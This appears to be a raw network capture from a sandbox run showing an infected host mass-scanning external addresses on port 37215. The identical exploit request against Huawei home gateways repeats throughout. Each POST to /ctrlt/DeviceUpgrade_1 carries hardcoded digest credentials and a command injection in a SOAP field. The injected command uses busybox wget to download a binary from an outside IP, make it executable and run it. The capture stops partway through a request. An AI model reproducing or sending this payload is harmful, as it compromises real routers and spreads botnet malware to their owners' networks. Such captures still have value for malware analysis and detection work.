68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            604192.168.2.155818441.192.14.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159876108 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            605192.168.2.155486441.40.42.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159879923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            606192.168.2.155089241.117.46.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159909964 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            607192.168.2.155185441.188.111.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159912109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            608192.168.2.154225641.25.146.23637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159965992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            609192.168.2.155076441.132.249.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159972906 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            610192.168.2.154404841.29.224.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159976006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            611192.168.2.154702841.17.217.1137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159976006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            612192.168.2.155009441.120.136.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159979105 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            613192.168.2.153933841.202.139.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160043001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            614192.168.2.155025841.143.190.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160044909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
